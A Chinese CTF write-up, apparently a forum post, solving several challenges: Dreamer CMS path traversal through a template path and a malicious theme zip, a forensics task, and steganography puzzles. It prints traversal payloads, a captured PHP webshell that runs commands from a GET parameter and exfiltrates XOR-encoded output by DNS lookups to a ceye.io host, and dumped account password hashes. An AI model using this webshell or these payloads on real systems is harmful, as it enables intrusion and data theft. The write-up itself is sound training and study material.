一直点就能得到flag
拿到题感觉有点儿懵
先下发靶机看一眼
梦想家CMS,好嘛,我直接一手查找官网
直接一手演示中心碰运气
哎嘿嘿,运气不错进去了,突然想起之前有位大佬写的关于Dreamer CMS的代码审计文章了
https://forum.butian.net/index.php/share/2183
想想题目一开始给的提示,flag在根目录下/flag
考虑一下使用后台设置栏目存在任意文件读取漏洞看看能不能读取flag
点击左侧栏中的“栏目/文章”选项进入到栏目管理,新建顶级栏目,创建一个命名为测试的顶级栏目。
在封面模版处,添加路径为:
../../../../../../../../../../flag
点击保存,访问前台,重新访问对应的顶级栏目,得到flag
跟上一个题一样
第一种思路是跟上一个题目一样,只不过把访问的文件改成../../.../../../../proc/1/environ
第二种思路是利用后台模板管理可以任意编辑的漏洞
先把default_v2
目录复制一份,修改成default_v3
。
修改其中的theme.json
文件。将其中的themePath
值修改成../../../../../../../../../../../../../../
然后打包default_v3
成default_v3.zip
,到后台风格管理处上传zip文件并启用主题。
此时再去访问模版管理即可从根目录访问所有文件
跟之前一样,访问/proc/1/environ
,即可找到flag
可以看到执行命令的被外带了,响应包并不会有回显
注入查询出来的数据库数据,里面有admin的密码
有了加密逻辑以及密码,就可以解密数据了,外带的数据也被wireshark截获了
去除重复的,总共有八段数据,一开始测试的时候发现除了第一条和第四条能成功解密,其他都是乱码,经过摸索才发现每条需要按照[0:] [1:] [2:] [4:]截断,其中[1:]的还得去掉最后一位,才能正确解密,而且解密出来的明文在开头还会丢失一两位字符。可能与加密逻辑的if (strlen($hex_xor . $char_xor) > $max_subdomain_length) {...}
这段处理有关,不过我实在看不出来这段为啥会造成数据丢失
根据加密逻辑,解密处理
解密结果:
flag经过DNS Cipher处理:https://github.com/karma9874/DNA-Cipher-Script-CTF
替换几位会发现flag格式是uuid形式的,按照以下这个规则替换即可
有丢失,尝试根据DNA Cipher的规则猜测
最终flag: flag{d1ee664e-babd-11ed-bb75-00155db0066}
netpixeljihad.png
是在提醒PixelJihad stego
: https://sekao.net/pixeljihad/
不过需要密码,图片末尾附加了一串数字,两次hex之后Text Encoding Brute Force
得到压缩包密码,使用https://sekao.net/pixeljihad/ 这个网站进行解密
解压后的文件如下
https://www.dcode.fr/decabit-code 使用该网站解密即可
使用microDicom查看题目给出的文件
导出图片看看:File->Export->To a picture file...
注意选择没有注解的,不勾选Show annotations
以及勾选Without overlay
Stegsolve
看了看开头和结尾几张图片,发现最后三张图片有LSB痕迹
但是LSB,又看不出来啥,不过这里是灰度图,所以观察下单通道数据
task_Frame18.png
task_Frame19.png
task_Frame20.png
一开始看到三张都有LSB数据,以为可能是RGB数据,尝试读取每一位写成像素,组成一张图片,发现不是,直接看字节看不出来什么,尝试转成二进制再看看,各取第一个字节分析下
按照18->19->20
的顺序把二进制的每一位连接起来,组了前八位发现0x89
,果然还是三张图片的LSB数据拆分组合形成组成新图片,只不过是二进制的每一位。接下来就好办了,Stegsolve
把每张图片的LSB数据导出来
先把二进制数据取出来,注意补高
然后再按照顺序把每张图的LSB数据的每一位二进制拼接起来,最后转成PNG图片即可
得到flag
https://forum.butian.net/index.php/share/2183
https://blog.csdn.net/mochu7777777/article/details/130255217
<?php $servername
=
"127.0.0.1"
;
$username
=
"root"
;
$password
=
"123456"
;
$dbname
=
"zentao"
;
$conn
=
new PDO(
"mysql:host=$servername;dbname=$dbname"
,$username,$password);
$conn
-
>setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION);
$stmt
=
$conn
-
>prepare(
"SELECT password FROM zt_user WHERE account=\'admin\'"
);
$stmt
-
>execute();
$result
=
$stmt
-
>fetch(PDO::FETCH_ASSOC);
$conn
=
null;
$param
=
$_GET[
"cmd"
];
$password
=
$result[
"password"
];
$output
=
shell_exec($param);
$hex_output
=
bin2hex($output);
$hex_password
=
bin2hex($password);
$len_output
=
strlen($hex_output);
$len_password
=
strlen($hex_password);
$max_subdomain_length
=
62
;
$subdomain_base
=
"yafgcy.ceye.io"
;
$hex_xor
=
"";
for
($i
=
0
;$i<$len_output;$i
+
+
) {
$char_output
=
$hex_output[$i];
$char_password
=
$hex_password[$i
%
$len_password];
$char_xor
=
dechex(hexdec($char_output)^hexdec($char_password));
if
(strlen($hex_xor.$char_xor)>$max_subdomain_length) {
if
(strlen($hex_xor)
%
2
!
=
0
) {
$subdomain
=
"0"
.
"$hex_xor.$subdomain_base"
;
}
else
{
$subdomain
=
"$hex_xor.$subdomain_base"
;
}
gethostbyname($subdomain);
$hex_xor
=
"";
}
else
{
$hex_xor.
=
$char_xor;
}
}
if
(strlen($hex_xor)
%
2
!
=
0
) {
$subdomain
=
"0"
.
"$hex_xor.$subdomain_base"
;
}
else
{
$subdomain
=
"$hex_xor.$subdomain_base"
;
}
gethostbyname($subdomain);
?>
<?php $servername
=
"127.0.0.1"
;
$username
=
"root"
;
$password
=
"123456"
;
$dbname
=
"zentao"
;
$conn
=
new PDO(
"mysql:host=$servername;dbname=$dbname"
,$username,$password);
$conn
-
>setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION);
$stmt
=
$conn
-
>prepare(
"SELECT password FROM zt_user WHERE account=\'admin\'"
);
$stmt
-
>execute();
$result
=
$stmt
-
>fetch(PDO::FETCH_ASSOC);
$conn
=
null;
$param
=
$_GET[
"cmd"
];
$password
=
$result[
"password"
];
$output
=
shell_exec($param);
$hex_output
=
bin2hex($output);
$hex_password
=
bin2hex($password);
$len_output
=
strlen($hex_output);
$len_password
=
strlen($hex_password);
$max_subdomain_length
=
62
;
$subdomain_base
=
"yafgcy.ceye.io"
;
$hex_xor
=
"";
for
($i
=
0
;$i<$len_output;$i
+
+
) {
$char_output
=
$hex_output[$i];
$char_password
=
$hex_password[$i
%
$len_password];
$char_xor
=
dechex(hexdec($char_output)^hexdec($char_password));
if
(strlen($hex_xor.$char_xor)>$max_subdomain_length) {
if
(strlen($hex_xor)
%
2
!
=
0
) {
$subdomain
=
"0"
.
"$hex_xor.$subdomain_base"
;
}
else
{
$subdomain
=
"$hex_xor.$subdomain_base"
;
}
gethostbyname($subdomain);
$hex_xor
=
"";
}
else
{
$hex_xor.
=
$char_xor;
}
}
if
(strlen($hex_xor)
%
2
!
=
0
) {
$subdomain
=
"0"
.
"$hex_xor.$subdomain_base"
;
}
else
{
$subdomain
=
"$hex_xor.$subdomain_base"
;
}
gethostbyname($subdomain);
?>
<xmp
class
=
'a-left'
>select account,password
from
zt_user<
/
xmp>{
"status"
:
"success"
,
"data"
:
"[{\"account\":\"admin\",\"password\":\"8a3e684c923b763d252cf1e8734a7a29\"},{\"account\":\"productManager\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"projectManager\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"dev1\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"dev2\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"dev3\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"tester1\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"tester2\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"tester3\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"testManager\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"test\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"}]"
,
"md5"
:
"71cfaa7002d809c0860d3749abb3454c"
}
<xmp
class
=
'a-left'
>select account,password
from
zt_user<
/
xmp>{
"status"
:
"success"
,
"data"
:
"[{\"account\":\"admin\",\"password\":\"8a3e684c923b763d252cf1e8734a7a29\"},{\"account\":\"productManager\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"projectManager\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"dev1\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"dev2\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"dev3\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"tester1\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"tester2\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"tester3\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"testManager\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"},{\"account\":\"test\",\"password\":\"e10adc3949ba59abbe56e057f20f883e\"}]"
,
"md5"
:
"71cfaa7002d809c0860d3749abb3454c"
}
59115a4b465044695a5a56015c4252065e501c130e416f5c5647556b510044
0
5b0e5d4b5f5b5b69505c57074f18430c423f5b0c0852105a521d4409476b
5
4a
32135c07594c474d4d4a47684453501657411c171e456f4c5f5659043d19
0c49
5011391d4e40054d495a4368
79227024716c7522787370254c777230667673222570247b76677322632671
d
7b357226771575227a7372237677702573611f372570317b767277207620
6
14
79207024777b60247e6674231a626727666171372570317f766773207620
0678
79226731756c60206d75703670754e
59115a4b465044695a5a56015c4252065e501c130e416f5c5647556b510044
0
5b0e5d4b5f5b5b69505c57074f18430c423f5b0c0852105a521d4409476b
5
4a
32135c07594c474d4d4a47684453501657411c171e456f4c5f5659043d19
0c49
5011391d4e40054d495a4368
79227024716c7522787370254c777230667673222570247b76677322632671
d
7b357226771575227a7372237677702573611f372570317b767277207620
6
14
79207024777b60247e6674231a626727666171372570317f766773207620
0678
79226731756c60206d75703670754e
<?php
$hex_output
=
"59115a4b465044695a5a56015c4252065e501c130e416f5c5647556b510044"
;
$hex_password
=
bin2hex(
"8a3e684c923b763d252cf1e8734a7a29"
);
$len_output
=
strlen($hex_output);
$len_password
=
strlen($hex_password);
$hex_xor
=
"";
for
($i
=
0
; $i < $len_output; $i
+
+
) {
$char_data
=
$hex_output[$i];
$char_password
=
$hex_password[$i
%
$len_password];
$output
=
dechex(hexdec($char_data) ^ hexdec($char_password));
$hex_xor .
=
$output;
}
echo $hex_xor.
"\n"
;
echo hex2bin($hex_xor);
?>
<?php
$hex_output
=
"59115a4b465044695a5a56015c4252065e501c130e416f5c5647556b510044"
;
$hex_password
=
bin2hex(
"8a3e684c923b763d252cf1e8734a7a29"
);
$len_output
=
strlen($hex_output);
$len_password
=
strlen($hex_password);
$hex_xor
=
"";
for
($i
=
0
; $i < $len_output; $i
+
+
) {
$char_data
=
$hex_output[$i];
$char_password
=
$hex_password[$i
%
$len_password];
$output
=
dechex(hexdec($char_data) ^ hexdec($char_password));
$hex_xor .
=
$output;
}
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2023-5-17 08:56
被SkyShadow编辑
,原因: